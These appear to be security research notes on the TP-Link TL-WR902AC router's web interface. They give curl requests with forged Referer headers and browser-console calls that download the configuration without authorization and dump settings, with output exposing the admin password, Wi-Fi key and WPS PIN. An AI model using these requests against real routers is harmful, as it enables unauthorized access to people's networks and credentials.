// // save the encryptor before the page is refreshed
// $.encrypt.encryptManager.recordEncryptor();
//
// // get the encryptor again
// var encryptor = $.encrypt.encryptManager.getEncryptor();
Note: Thank you for the helpful instructions 🙏
ⓘ Example AES key generation
$.act(ACT_CGI, "/cgi/getParm");
$.exe(null,false,0);

	# Request Parameters
	# [/cgi/getParm#0,0,0,0,0,0#0,0,0,0,0,0]0,0

	# Or, using cURL
	# curl -X POST "http://192.168.1.1/cgi?8" -H "Referer: http://192.168.1.1" -d $'[/cgi/getParm#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n'

	# Example Response
	# lib.js:396 XHR finished loading: POST "http://192.168.1.1/cgi?8"
	# [cgi]0
	# var ee="010001";
	# var nn="BF52337CDDC3F46ADE7663765F170AB464AE93BF981B02B95FCE1E94" +
	#        "62DD9A03ED3E09CCEFDFD7FACE81EE38136FC081735686FE630BBADB" +
	#        "DAB24BE0443A2B25";
	# var seq="812508797";
	# $.ret=0;
	# [error]0

// Feed the values returned by /cgi/getParm into the client-side encryptor
$.nn = nn;
$.ee = ee;
$.seq = seq;

$.Iencryptor.setSeq($.seq);
$.Iencryptor.setRSAKey($.nn, $.ee);
$.Iencryptor.setHash(userName, password);   // the web-UI login credentials
$.Iencryptor.genAESKey();
ⓘ $.io() {Log decrypted responses while debugging and disable page reloading}
// Override of the library's $.io() from lib.js: sends the same request but only
// logs the response and never triggers the page reload the original performs
$.io = function(path, bScript, hook, data, noquit, unerr) {
    $.ajax(
    {
        type: data ? "POST" : "",
        url: path,
        bScript: bScript,
        async: true,
        data: data ? data : null,
        success: r => console.log(r),
        error: e => console.log(e)
    });
}

// Try the modifications (Reload to revert)
$.act(ACT_GET, USER_CFG, null, null, ["adminName", "adminPwd"]);
$.exe(null, false, 1);
Note: The third parameter of $.exe(null, false, 1) defines the securityLevel: 1 enables AES encryption and the use of /cgi_gdpr; 0 means no encryption and the use of /cgi.

Information Gathering

ⓘ CGI URLs
// Source: /usr/bin/httpd
// Firmware: 191018

/cgi/conf.bin
/cgi/confencode
/cgi/confup
/cgi/bnr
/cgi/softup
/cgi/softburn
/cgi/log
/cgi/info
/cgi/lanMac
/cgi/auth
/cgi/pvc
/cgi/ansi
/cgi/usb3gup
/cgi/usb3gupburn
/cgi/logout
/cgi/route
/cgi/updateWlThroughput
/cgi/updateWlThroughput5G
/cgi/getParm
/cgi/login

/cgi_gdpr
ⓘ Webserver URLs
// Firmware: 191018

/web
├── MenuRpm.htm
├── css
   ├── ban.css
   ├── css_help.css
   ├── ie6.css
   ├── ie7.css
   ├── ie8.css
   ├── main.css
   ├── menu.css
   ├── other.css
   ├── qr.css
   └── top.css
├── domain-redirect.htm
├── frame
   ├── accErr.htm
   ├── banner.htm
   ├── login.htm
   ├── menu.htm
   └── top.htm
├── help
   ├── AccessCtrlAccessRulesAdvHelpRpm.htm
   ├── AccessCtrlAccessRulesHelpRpm.htm
   ├── AccessCtrlAccessTargetsAdvHelpRpm.htm
   ├── AccessCtrlAccessTargetsHelpRpm.htm
   ├── AccessCtrlHostsListsAdvHelpRpm.htm
   ├── AccessCtrlHostsListsHelpRpm.htm
   ├── AccessCtrlTimeSchedAdvHelpRpm.htm
   ├── AccessCtrlTimeSchedHelpRpm.htm
   ├── AssignedIpAddrListHelpRpm.htm
   ├── BackNRestoreHelpRpm.htm
   ├── BasicSecurityHelpRpm.htm
   ├── BpaCfgHelpRpm.htm
   ├── ChangeLoginPwdHelpRpm.htm
   ├── DMZHelpRpm.htm
   ├── DateTimeCfgHelpRpm.htm
   ├── DdnsAddComexeHelpRpm.htm
   ├── DiagHelp.htm
   ├── DualBandSelectionHelpRpm.htm
   ├── DynDdnsHelpRpm.htm
   ├── FeedbackHelp.htm
   ├── FixMapCfgHelpRpm.htm
   ├── GuestNetUsbCfgHelpRpm.htm
   ├── GuestNetWirelessCfgHelpRpm.htm
   ├── GuestNetWirelessCfgHelpRpmWithFacebook.htm
   ├── IPTVHelp.htm
   ├── IPv6LanHelp.htm
   ├── IPv6StatusHelpRpm.htm
   ├── IPv6TunnelHelp.htm
   ├── L2tpCfgHelpRpm.htm
   ├── LanArpBindingHelpRpm.htm
   ├── LanArpBindingListHelpRpm.htm
   ├── LanDhcpServerHelpRpm.htm
   ├── LanDhcpServerHelpRpm_AP.htm
   ├── LocalManageControlHelpRpm.htm
   ├── MacCloneCfgHelpRpm.htm
   ├── ManageControlHelpRpm.htm
   ├── ManageCtrl_h.htm
   ├── MediaServerCfgHelpRpm.htm
   ├── MiscHelpRpm.htm
   ├── NasCfgHelpRpm.htm
   ├── NasFtpCfgHelpRpm.htm
   ├── NasUserAdvRpm.htm
   ├── NasUserCfgHelpRpm.htm
   ├── NatStatusCfgHelpRpm.htm
   ├── NetworkCfgHelpRpm.htm
   ├── NetworkCfgHelpRpm_AP.htm
   ├── NoipDdnsHelpRpm.htm
   ├── PPPoECfgHelpRpm.htm
   ├── PPPoEv6CfgHelpRpm.htm
   ├── ParentCtrlAdvHelpRpm.htm
   ├── ParentCtrlHelpRpm.htm
   ├── PingHelpRpm.htm
   ├── PingWatchDogHelpRpm.htm
   ├── PptpCfgHelpRpm.htm
   ├── PrintServerCfgHelpRpm.htm
   ├── QoSCfgHelpRpm.htm
   ├── QoSRuleCfgHelpRpm.htm
   ├── QoSRuleListHelpRpm.htm
   ├── Qs3gHelpRpm.htm
   ├── QsChangeLoginPwdHelpRpm.htm
   ├── QsLanApHelpRpm.htm
   ├── QsModeHelpRpm.htm
   ├── QsMultissidHelpRpm.htm
   ├── QsReviewHelpRpm.htm
   ├── QsWlClientHelpRpm.htm
   ├── QsWlScanClientHelpRpm.htm
   ├── RestoreDefaultCfgHelpRpm.htm
   ├── SiteSurveyHelpRpm.htm
   ├── SnmpHelpRpm.htm
   ├── SoftwareUpgradeHelpRpm.htm
   ├── SpecialAppHelpRpm.htm
   ├── StaticRouteTableHelpRpm.htm
   ├── StatusHelpRpm.htm
   ├── StatusHelpRpm_AP.htm
   ├── StatusHelpRpm_Client.htm
   ├── StatusHelpRpm_Modem.htm
   ├── StatusHelpRpm_Repeater.htm
   ├── SysAutoRebootHelpRpm.htm
   ├── SysRebootHelpRpm.htm
   ├── SysRouteTableHelpRpm.htm
   ├── SystemLogHelpRpm.htm
   ├── SystemStatisticHelpRpm.htm
   ├── UpnpCfgHelpRpm.htm
   ├── Usb3gHelpRpm.htm
   ├── Usb3gModemListHelpRpm.htm
   ├── UsbAccountHelp.htm
   ├── UsbDlnaHelp.htm
   ├── UsbFtpHelp.htm
   ├── UsbMassHelp.htm
   ├── UsbSharingHelp.htm
   ├── VirtualServerHelpRpm.htm
   ├── Wan6DisabledCfgHelpRpm.htm
   ├── Wan6to4TunnelCfgHelpRpm.htm
   ├── WanDynamicIpCfgHelpRpm.htm
   ├── WanDynamicIpV6CfgHelpRpm.htm
   ├── WanStaticIpCfgHelpRpm.htm
   ├── WanStaticIpV6CfgHelpRpm.htm
   ├── WlanAdvHelpRpm.htm
   ├── WlanAdvHelpRpm_AP.htm
   ├── WlanConnectHelpRpm.htm
   ├── WlanExtender5GHelpRpm.htm
   ├── WlanExtenderHelpRpm.htm
   ├── WlanMacFilterHelpRpm.htm
   ├── WlanNetworkHelpRpm.htm
   ├── WlanNetworkHelpRpm_AP.htm
   ├── WlanNetworkHelpRpm_MSSID.htm
   ├── WlanSchedule.htm
   ├── WlanSecurityHelpRpm.htm
   ├── WlanStationHelpRpm.htm
   ├── WlanThroughputHelpRpm.htm
   ├── WlanWpsChkModeHelpRpm.htm
   ├── WlanWpsHelpRpm.htm
   ├── WlanWpsHelpRpm_AP.htm
   ├── WzdAccessCtrlHostAddHelpRpm.htm
   ├── WzdAccessCtrlRuleAddHelpRpm.htm
   ├── WzdAccessCtrlSchedAddHelpRpm.htm
   ├── WzdAccessCtrlTargetAddHelpRpm.htm
   ├── WzdConfirmHelpRpm.htm
   ├── WzdFinishHelpRpm.htm
   ├── WzdL2TPHelpRpm.htm
   ├── WzdPPPoEHelpRpm.htm
   ├── WzdPPTPHelpRpm.htm
   ├── WzdStartHelpRpm.htm
   ├── WzdStaticIpHelpRpm.htm
   ├── WzdWanMACHelpRpm.htm
   ├── WzdWanTypeHelpRpm.htm
   ├── WzdWlanHelpRpm.htm
   ├── WzdWlanHelpRpm_AP.htm
   ├── YandexDnsHelpRpm.htm
   └── ledControlHelp.htm
├── img
   ├── Thumbs.db
   ├── bgColor.jpg
   ├── check.gif
   ├── col_hide.gif
   ├── col_show.gif
   ├── empty.gif
   ├── error.gif
   ├── helpPic.gif
   ├── icon.jpg
   ├── loading.gif
   ├── login
      ├── domain-redirect.png
      ├── favicon.ico
      ├── info.png
      ├── input-box.png
      ├── input-box1.png
      ├── loginBg.png
      ├── loginButton.png
      ├── loginButton1.png
      ├── logo.png
      ├── ok.png
      ├── password.png
      ├── qr.png
      ├── top-right.png
      ├── tp-beta-mark.png
      ├── username.png
      └── wrong.png
   ├── mark_copy.gif
   ├── menu-white-noradius.png
   ├── menu-white.png
   ├── menu-yellow.png
   ├── minus.gif
   ├── plus.gif
   ├── pw.gif
   ├── signalstrength.gif
   ├── switch.gif
   └── td-blue.png
├── index.htm
├── js
   ├── 3g.js
   ├── cryptoJS.min.js
   ├── custom.js
   ├── encrypt.js
   ├── err.js
   ├── help.js
   ├── language.js
   ├── lib.js
   ├── local.js
   ├── oid_str.js
   ├── root.js
   ├── str.js
   ├── tpEncrypt.js
   └── vlancfg.js
├── main
   ├── alg.htm
   ├── arpBind.htm
   ├── arpBindEdit.htm
   ├── arpList.htm
   ├── autoPVC.htm
   ├── backNRestore.htm
   ├── basicSec.htm
   ├── clientMode.htm
   ├── clientMode5G.htm
   ├── cwmp.htm
   ├── ddos.htm
   ├── ddos_host.htm
   ├── defGateway.htm
   ├── defGateway6.htm
   ├── defaultCfg.htm
   ├── dhcp.htm
   ├── dhcpAP.htm
   ├── dhcpClient.htm
   ├── dhcpCond.htm
   ├── dhcpCondEdit.htm
   ├── dhcpEdit.htm
   ├── dhcpEditAP.htm
   ├── dhcpStatic.htm
   ├── dhcpStaticEdit.htm
   ├── diagnostic.htm
   ├── div.htm
   ├── dlnaManage.htm
   ├── dmz.htm
   ├── dsl.htm
   ├── dslcfg.htm
   ├── dynamicIp.htm
   ├── ethIptv.htm
   ├── ethWan.htm
   ├── ethWan6.htm
   ├── ftpSrv.htm
   ├── fw6Lan.htm
   ├── fw6LanEdit.htm
   ├── fw6Rules.htm
   ├── fw6RulesEdit.htm
   ├── fw6Sche.htm
   ├── fw6ScheEdit.htm
   ├── fw6Wan.htm
   ├── fw6WanEdit.htm
   ├── fwLan.htm
   ├── fwLanEdit.htm
   ├── fwRules.htm
   ├── fwRulesEdit.htm
   ├── fwSche.htm
   ├── fwScheEdit.htm
   ├── fwWan.htm
   ├── fwWanEdit.htm
   ├── group.htm
   ├── groupAdd.htm
   ├── hw_nat.htm
   ├── ipoa.htm
   ├── ipsec.htm
   ├── ipsecConfig.htm
   ├── iptv.htm
   ├── lan.htm
   ├── lan6.htm
   ├── lanAP.htm
   ├── lanEdit.htm
   ├── lanEditAP.htm
   ├── ledControl.htm
   ├── local.htm
   ├── log.htm
   ├── logConf.htm
   ├── macClone.htm
   ├── manageCtrl.htm
   ├── no.htm
   ├── parentCtrl.htm
   ├── password.htm
   ├── phDDNS.htm
   ├── pingNTraceRoute.htm
   ├── pingWatchDog.htm
   ├── portTrigEdit.htm
   ├── portTrigger.htm
   ├── pppoa.htm
   ├── pppoe.htm
   ├── printSrv.htm
   ├── qos.htm
   ├── qosAppEdit.htm
   ├── qosClsEdit.htm
   ├── qosList.htm
   ├── qosQueueEdit.htm
   ├── qs3g.htm
   ├── qsAuto.htm
   ├── qsBandSelect.htm
   ├── qsDetectErr.htm
   ├── qsDsl.htm
   ├── qsEnd.htm
   ├── qsIPoA.htm
   ├── qsL2tp.htm
   ├── qsLan.htm
   ├── qsMacClone.htm
   ├── qsMode.htm
   ├── qsMultiSSID.htm
   ├── qsPPP.htm
   ├── qsPPPoA.htm
   ├── qsPptp.htm
   ├── qsReview.htm
   ├── qsSave.htm
   ├── qsStaIP.htm
   ├── qsStart.htm
   ├── qsType.htm
   ├── qsWl.htm
   ├── qsWl5G.htm
   ├── qsWlAP.htm
   ├── qsWlAP5G.htm
   ├── qsWlClient.htm
   ├── qsWlHotspot.htm
   ├── qsWlScanClient.htm
   ├── qspassword.htm
   ├── remote.htm
   ├── restart.htm
   ├── rip.htm
   ├── route.htm
   ├── route6.htm
   ├── route6Edit.htm
   ├── routeEdit.htm
   ├── routeTbl.htm
   ├── snmp.htm
   ├── softup.htm
   ├── stat.htm
   ├── staticIp.htm
   ├── status.htm
   ├── status6.htm
   ├── sysMode.htm
   ├── time.htm
   ├── trafCtrlEdit.htm
   ├── trafficCtrl.htm
   ├── tunnel6.htm
   ├── upnp.htm
   ├── usb3g.htm
   ├── usb3gModemList.htm
   ├── usb3gUpload.htm
   ├── usbFolderBrowse.htm
   ├── usbManage.htm
   ├── usbSmbSrv.htm
   ├── usbUserAccount.htm
   ├── userFeedBack.htm
   ├── virtualServer.htm
   ├── vtlServEdit.htm
   ├── wan.htm
   ├── wlAcl.htm
   ├── wlAcl5G.htm
   ├── wlAclAdv.htm
   ├── wlAclAdv5G.htm
   ├── wlAclAdvMssid.htm
   ├── wlAclMssid.htm
   ├── wlAdv.htm
   ├── wlAdv5G.htm
   ├── wlBasic.htm
   ├── wlBasic5G.htm
   ├── wlBasicAP.htm
   ├── wlBasicAP5G.htm
   ├── wlBasicHotspot.htm
   ├── wlBasicHotspot5G.htm
   ├── wlBasicMssid.htm
   ├── wlConnect.htm
   ├── wlConnect5G.htm
   ├── wlExtender.htm
   ├── wlExtender5G.htm
   ├── wlFrequency.htm
   ├── wlGuest.htm
   ├── wlGuest5G.htm
   ├── wlGuestStats.htm
   ├── wlGuestStats5G.htm
   ├── wlQss.htm
   ├── wlQss5G.htm
   ├── wlQssAdv.htm
   ├── wlQssAdv5G.htm
   ├── wlScan.htm
   ├── wlScan5G.htm
   ├── wlScanClient.htm
   ├── wlScanClient5G.htm
   ├── wlScheEdit.htm
   ├── wlScheEdit5G.htm
   ├── wlSec.htm
   ├── wlSec5G.htm
   ├── wlSecMssid.htm
   ├── wlStats.htm
   ├── wlStats5G.htm
   ├── wlThroughput.htm
   ├── wlThroughput5G.htm
   ├── yandexDns.htm
   └── yandexDnsEdit.htm
├── mainFrame.htm
├── qr.htm
└── xml
    └── log.txt

8 directories, 388 files

Using Packet Injection

To extract information from the server, one can either forge requests with cURL or use the predefined JS functions executed via the web browser's console. Since any direct call to the web server ends in a 403 Forbidden HTTP error, except for the root of the web server, the Referer header has to be set to the web server's IP address. This is necessary because the web interface is built so that the main frame loads its content via AJAX without ever reloading the complete page. Using this method one can also send the authorization or session cookie if it has already been acquired. However, this isn't needed for most calls on the TL-WR902AC with firmware version 170828. Separate versions may be listed below, depending on the firmware version.
ⓘ Download any file from the webserver (Unauthorized)
curl -X GET "http://192.168.1.1/js/oid_str.js" -H "Referer: http://192.168.1.1"
ⓘ Get current session information (Authorized)
curl -X POST "http://192.168.1.1/cgi/info" --cookie "Authorization=Basic YWRtaW46YWRtaW4=" -H "Referer: http://192.168.1.1"
var userType="Admin";
var bSecured=0;
var clientLocal=1;
var clientIp="192.168.1.100";
var clientMac="XX:XX:XX:XX:XX:XX";
$.ret=0;
ⓘ Download the device configuration (Unauthorized)
curl -X POST "http://192.168.1.1/cgi/conf.bin" -H "Referer: http://192.168.1.1" --output ./conf.bin
Note: The downloaded conf.bin has not been analyzed so far.

Using JavaScript Injection

cURL could also be used for CGI calls with a forged payload. But since the data format accepted by the CGI daemon is quite complicated to understand, it is easier to let the JS libraries delivered with the front-end web page do that job for us. Still, it is possible to forge or replay such payloads if they were acquired via packet sniffing or similar. The data format accepted by the CGI is not analysed much further here. Instead, the following commands are executed via the console of a web browser on the TP-Link web page using the $.act() and $.exe() functions defined in /js/lib.js. This will be elaborated in the next chapter, Common Gateway Interface. For now, the examples used for information gathering are listed without explanations.
Note: The firmware identifiers used here are in fact the "buildDate" (YYMMDD). I use these to better draw links between different devices, assuming a common code base and vulnerabilities. See the Firmware section for more information.
ⓘ Get Device Information including FW version.
// Firmware: 170828
$.act(ACT_GET, IGD_DEV_INFO); $.exe();
// Firmware: 190428
$.act(ACT_GET, IGD_DEV_INFO); $.exe(null, false, 0);
ⓘ Use ACT_GET (and ACT_GL) to create the largest possible Information leaking command.
// Firmware: 170828
var act_get_oid_list = ["IGD", "IGD_DEV_INFO", "SYSLOG_CFG", "ETH_SWITCH", "SYS_CFG", "NET_CFG", "USER_CFG", "CURRENT_USER", "APP_CFG", "HTTP_CFG", "DYN_DNS_CFG", "UPNP_CFG", "DIAG_TOOL", "NOIP_DNS_CFG", "CMX_DNS_CFG", "WAN_TYPE_DETECT", "DMZ_HOST_CFG", "TIME", "HOUR", "L3_FORWARDING", "L3_IP6_FORWARDING", "L2_BRIDGING", "LAN_HOST_ENTRY", "WAN_ETH_INTF_STATS", "WAN_L2TP_CONN_STATS", "WAN_PPTP_CONN_STATS", "WAN_PPP_CONN_STATS", "STAT_CFG", "DDOS_CFG", "ARP_BIND", "TC", "ALG_CFG", "FIREWALL", "IP6_FIREWALL", "IP6_TUNNEL", "DSLITE", "SIT_6RD", "STORAGE_SERVICE", "CAPABLE", "FOLDER_BROWSE", "DLNA_MEDIA_SERVER", "SMB_SERVICE", "FTP_SERVER", "SYS_MODE", "EWAN", "CLOUD_SERVICE", "FW_UPGRADE_INFO", "OWNER_INFO", "CURRENT_USER_INFO", "CLOUD_DDNS", "CLOUD_DDNS_ENTRY", "WAN_ERROR_BLOCK", "FW_UP_INFO_BLOCK", "IPPING_DIAG", "TRACEROUTE_DIAG", "VLAN", "IPV6_CFG", "PRODUCE_INFO", "MULTIMODE", "PING_WATCH_DOG"];
for(let i=0; i<act_get_oid_list.length; i++){
	$.act(ACT_GET, act_get_oid_list[i]);
}
$.act(ACT_GL,LAN_WLAN);
$.exe();
ⓘ Example Results (447 lines) (including "adminName", "adminPwd", "X_TP_PreSharedKey" and "flashPin"!)
[0,0,0,0,0,0]0
deviceSummary=InternetGatewayDevice:1.1[](Baseline:1, EthernetLAN:1)
LANDeviceNumberOfEntries=1
WANDeviceNumberOfEntries=0
[0,0,0,0,0,0]1
manufacturer=TP-Link
manufacturerOUI=98DAC4
modelName=TL-WR902AC
description=AC750 Wi-Fi Travel Router
productClass=IGD
serialNumber=98DAC46E00FC
hardwareVersion=TL-WR902AC v3 00000001
softwareVersion=0.9.1 0.1 v0089.0 Build 170828 Rel.57433n(4555)
modemFirmwareVersion=
enabledOptions=
additionalHardwareVersion=00000001
additionalSoftwareVersion=
specVersion=1.0
provisioningCode=
upTime=16922
firstUseDate=
deviceLog=0x58801d58
X_TP_HardwareID=6146446FA85583FDD5135E8275E48010
X_TP_FirmwareID=EF04518B7BA1296A8F491C96C45F01E9
X_TP_HardwareDescription=TL-WR902AC 3.0
X_TP_isFD=1
X_TP_DevManufacturerURL=http://www.tp-link.com
X_TP_DevModelVersion=3.0
X_TP_ProductID=903311
X_TP_ProductVersion=137
X_TP_SoftwareRevision=1437204481
X_TP_SoftwareRevisionMinor=0
X_TP_PlatformVersion=2768242945
X_TP_BuildDate=170828
X_TP_BuildTime=57433
[0,0,0,0,0,0]2
logToRemote=0
remoteSeverity=4
serverIP=192.168.0.100
serverPort=514
facility=1
logToLocal=1
localSeverity=6
logHeadPos=0
logTailPos=3897
[0,0,0,0,0,0]3
enableVirtualPorts=0
numberOfVirtualPorts=4
ifName=eth0
[0,0,0,0,0,0]4
flashMac=98:DA:C4:6E:00:FC
flashPin=37490720
flashZoneId=EUR
flashDevId=8000FB75D7711C1F692E48B22DE039B81BA9945D
flashOemId=A724943A07C41281802668C26C685D1A
flashSpecialId=45550000
flashCountryCode=DE
sign=
signLen=0
publicKey1=BgIAAACkAABSU0ExAAQAAAEAAQCNrP4jIUWitcvDIHr3OHnlzLCjGyJoLXgY9uH7tAVaYN+2YWEQ9RuS4PIQo7uWwHs7PYTAh9vF
publicKey2=pdMfu6NNkdvneLUER5V7Q5HtmPXd3roiIMi55tK7lA0B67bjYpBE/JM+SLbyMRgeNWut0YoufpLNV24ZQa0p7Xj4M5m2ZDclnA==
publicKeyLen=200
signStatus=0
[0,0,0,0,0,0]5
DNSServers=192.168.0.1,0.0.0.0
DNSifAliasName=ewan_ipoe_d
currDNSServer=16820416
[0,0,0,0,0,0]6
rootName=
rootPwd=
adminName=admin
adminPwd=admin
userName=
userPwd=
[0,0,0,0,0,0]7
userName=
passwd=
httpSession=
userSetting=0
action=0
loginStatus=0
userRole=3
logInCloud=0
needReconn=0
[0,0,0,0,0,0]8
localHost=
remoteHost=
[0,0,0,0,0,0]9
httpCharset=utf-8
httpLocalEnabled=1
httpLocalPort=80
httpRemoteEnabled=0
httpRemotePort=80
httpsLocalEnabled=0
httpsLocalPort=443
httpsRemoteEnabled=0
httpsRemotePort=443
[0,0,0,0,0,0]10
enable=0
state=0
userName=
password=
userDomain=
server=members.dyndns.org
login=1
[0,0,0,0,0,0]11
enable=1
[0,0,0,0,0,0]12
currCommand=0
currHost=0.0.0.0
lastCommand=0
lastHost=0.0.0.0
lastResult=0
[0,0,0,0,0,0]13
enable=0
state=3
userName=
password=
userDomain=
server=dynupdate.no-ip.com
login=1
[0,0,0,0,0,0]14
enable=0
state=0
userName=
password=
userDomain1=
userDomain2=
userDomain3=
userDomain4=
userDomain5=
server=dns.comexe.cn
login=1
[0,0,0,0,0,0]15
ifName=
state=1
wanType=0
wanTypeGet=0
[0,0,0,0,0,0]16
enable=0
IPAddress=
[0,0,0,0,0,0]17
__status=2
NTPServer1=
NTPServer2=
NTPServer3=
NTPServer4=
NTPServer5=
currentLocalTime=2020-06-28T21:31:33+00:00
localTimeZone=+00:00
localTimeZoneName=
daylightSavingsUsed=0
daylightSavingsStart=
daylightSavingsEnd=
X_TP_DaylightSavingsStartWeekCount=0
X_TP_DaylightSavingsEndWeekCount=0
X_TP_ShowDaylightSavingOnWeb=1
[0,0,0,0,0,0]18
year=2020
month=6
day=28
hours=21
minutes=31
seconds=33
[0,0,0,0,0,0]19
__defaultGateway=192.168.0.1
__ifName=eth0.2
__ifAliasName=ewan_ipoe_d
defaultConnectionService=
forwardNumberOfEntries=0
[0,0,0,0,0,0]20
__defaultGateway=::
__ifName=eth0.2
__ifAliasName=ewan_ipoev6_d
defaultConnectionService=
IPv6ForwardNumberOfEntries=0
[0,0,0,0,0,0]21
maxBridgeEntries=16
maxFilterEntries=64
maxMarkingEntries=0
bridgeNumberOfEntries=1
filterNumberOfEntries=7
markingNumberOfEntries=0
availableInterfaceNumberOfEntries=7
[0,0,0,0,0,0]22
IPAddress=192.168.1.100
leaseTimeRemaining=5737
MACAddress=XX:XX:XX:XX:XX:XX
hostName=Z
X_TP_ConnType=1
[0,0,0,0,0,0]23
bytesSent=0
bytesReceived=0
packetsSent=0
packetsReceived=0
[0,0,0,0,0,0]24
ethernetBytesSent=0
ethernetBytesReceived=0
ethernetPacketsSent=0
ethernetPacketsReceived=0
ethernetErrorsSent=0
ethernetErrorsReceived=0
ethernetUnicastPacketsSent=0
ethernetUnicastPacketsReceived=0
ethernetDiscardPacketsSent=0
ethernetDiscardPacketsReceived=0
ethernetMulticastPacketsSent=0
ethernetMulticastPacketsReceived=0
ethernetBroadcastPacketsSent=0
ethernetBroadcastPacketsReceived=0
ethernetUnknownProtoPacketsReceived=0
[0,0,0,0,0,0]25
ethernetBytesSent=0
ethernetBytesReceived=0
ethernetPacketsSent=0
ethernetPacketsReceived=0
ethernetErrorsSent=0
ethernetErrorsReceived=0
ethernetUnicastPacketsSent=0
ethernetUnicastPacketsReceived=0
ethernetDiscardPacketsSent=0
ethernetDiscardPacketsReceived=0
ethernetMulticastPacketsSent=0
ethernetMulticastPacketsReceived=0
ethernetBroadcastPacketsSent=0
ethernetBroadcastPacketsReceived=0
ethernetUnknownProtoPacketsReceived=0
[0,0,0,0,0,0]26
ethernetBytesSent=0
ethernetBytesReceived=0
ethernetPacketsSent=0
ethernetPacketsReceived=0
ethernetErrorsSent=0
ethernetErrorsReceived=0
ethernetUnicastPacketsSent=0
ethernetUnicastPacketsReceived=0
ethernetDiscardPacketsSent=0
ethernetDiscardPacketsReceived=0
ethernetMulticastPacketsSent=0
ethernetMulticastPacketsReceived=0
ethernetBroadcastPacketsSent=0
ethernetBroadcastPacketsReceived=0
ethernetUnknownProtoPacketsReceived=0
[0,0,0,0,0,0]27
enable=0
interval=10
action=0
[0,0,0,0,0,0]28
enable=0
enableIcmpFilter=0
icmpThreshold=50
enableUdpFilter=0
udpThreshold=500
enableSynFilter=0
synThreshold=50
forbidLanPing=0
forbidWanPing=1
action=0
[0,0,0,0,0,0]29
enable=0
[0,0,0,0,0,0]30
TCRuleNumberOfEntries=0
enable=0
linkType=0
upTotalBW=0
downTotalBW=0
iptvEnable=0
iptvUpMinBW=0
iptvDownMinBW=0
voIPEnable=0
voIPUpMinBW=20
[0,0,0,0,0,0]31
pptpAlg=1
l2tpAlg=1
ipSecAlg=1
ftpAlg=1
tftpAlg=1
h323Alg=1
sipAlg=1
rtspAlg=1
hw_nat_enable=0
[0,0,0,0,0,0]32
enable=0
defaultAction=0
enalbeParentCtrl=0
parentMac=
[0,0,0,0,0,0]33
enable=0
defaultAction=0
[0,0,0,0,0,0]34
mechanism=2
associatedWanIfName=
enabled=0
localAddress=
associatedLanIfName=br0
[0,0,0,0,0,0]35
enabled=0
dynamic=0
remoteIPv6Address=
[0,0,0,0,0,0]36
enabled=0
dynamic=0
IPv4MaskLen=0
prefix=
prefixLen=0
borderRelayIPv4Address=
[0,0,0,0,0,0]37
enable=1
userAccountNumberOfEntries=0
physicalMediumNumberOfEntries=0
logicalVolumeNumberOfEntries=0
ready=1
[0,0,0,0,0,0]38
FTPCapable=1
supportedNetworkProtocols=SMB
supportedFileSystemTypes=FAT16,FAT32,NTFS
[0,0,0,0,0,0]39
targetPath=
[0,0,0,0,0,0]40
serverState=0
serverName=MediaShare:1
scanFlag=0
scanInterval=3600
[0,0,0,0,0,0]41
enable=1
anonymous=1
modified=0
[0,0,0,0,0,0]42
enable=1
portNumber=21
accessFromInternet=0
wanIP=0.0.0.0
modified=0
[0,0,0,0,0,0]43
mode=ETH
DSLL3ForwardingName=NO_INTERFACE
ETHL3ForwardingName=NO_INTERFACE
_3GL3ForwardingName=NO_INTERFACE
DSLL3IPv6ForwardingName=NO_INTERFACE
ETHL3IPv6ForwardingName=NO_INTERFACE
[0,0,0,0,0,0]44
enable=1
MACAddress=
ifName=eth0.2
[0,0,0,0,0,0]45
alias=
legality=0
illegalType=0
tcspStatus=1
[0,0,0,0,0,0]46
type=0
version=
releaseDate=
releaseLog=
url=
start=0
status=0
progress=0
[0,0,0,0,0,0]47
email=
passwd=
needUnbind=0
md5Crypt=0
[0,0,0,0,0,0]48
nickname=
role=-1
token=
ewebURL=
action=0
status=0
[0,0,0,0,0,0]49
enable=1
boundDomain=
tmpDomainName=
action=0
status=0
[0,0,0,0,0,0]50
domainName=
regDate=
isBind=0
[0,0,0,0,0,0]51
enable=1
errorType=0
[0,0,0,0,0,0]52
isIgnored=0
ignoredTime=0
[0,0,0,0,0,0]53
diagnosticsState=None
maximumResponseTime=0
minimumResponseTime=65535
averageResponseTime=0
failureCount=0
successCount=0
X_TP_PktSequence=0
X_TP_ResponseTime=0
X_TP_IPAddress=0.0.0.0
X_TP_Result=
X_TP_ConnName=
X_TP_IfName=
DSCP=0
dataBlockSize=64
timeout=100
numberOfRepetitions=2
host=0.0.0.0
interface=
[0,0,0,0,0,0]54
diagnosticsState=None
routeHopsNumberOfEntries=0
responseTime=0
maxHopCount=30
DSCP=0
dataBlockSize=64
timeout=5
numberOfTries=2
X_TP_HopSeq=0
X_TP_IPAddress=0.0.0.0
X_TP_Result=
X_TP_ConnName=
X_TP_IfName=
host=
interface=
[0,0,0,0,0,0]55
enable=1
internetGroupVlanID=2
internetGroupExtendID=0
internetGroupLanPort=255
internetGroupPriority=0
internetUntag=1
workingMode=
[0,0,0,0,0,0]56
disableIPv6=1
lastUsedWanConnection=
[0,0,0,0,0,0]57
online=0
[0,0,0,0,0,0]58
oneKeyRePressed=0
mode=Router
first_login=0
router_IPInterfaceIPAddress=
router_IPInterfaceSubnetMask=
[0,0,0,0,0,0]59
enable=0
IPAddress=
interval=10
delay=5
failCount=5
[1,2,0,0,0,0]60
__syncApStatus=0
__apLastStatus=3
enable=1
status=Up
name=wlan5
BSSID=98:DA:C4:6E:00:FB
channel=36
autoChannelEnable=0
X_TP_PreSSID=TP-Link
SSID=TP-Link_00FC_5G
beaconType=11i
MACAddressControlEnabled=0
X_TP_MACAddressControlRule=deny
X_TP_MACTableSize=0
X_TP_Configuration_Modified=0
X_TP_Band=5GHz
X_TP_Bandwidth=Auto
standard=ac
WEPKeyIndex=1
WEPEncryptionLevel=Disabled,40-bits,104-bits
basicEncryptionModes=None
basicAuthenticationMode=None
WPAEncryptionModes=TKIPandAESEncryption
WPAAuthenticationMode=PSKAuthentication
IEEE11iEncryptionModes=AESEncryption
IEEE11iAuthenticationMode=PSKAuthentication
X_TP_PreSharedKey=37490720
X_TP_GroupKeyUpdateInterval=0
possibleChannels=
basicDataTransmitRates=6,12,24,
operationalDataTransmitRates=1,2,5.5,11,6,9,12,18,
possibleDataTransmitRates=
SSIDAdvertisementEnabled=1
transmitPowerSupported=100,50,20
transmitPower=100
regulatoryDomain=DE 
deviceOperationMode=InfrastructureAccessPoint
X_TP_RadiusServerIP=
X_TP_RadiusServerPort=1812
X_TP_RadiusServerPassword=
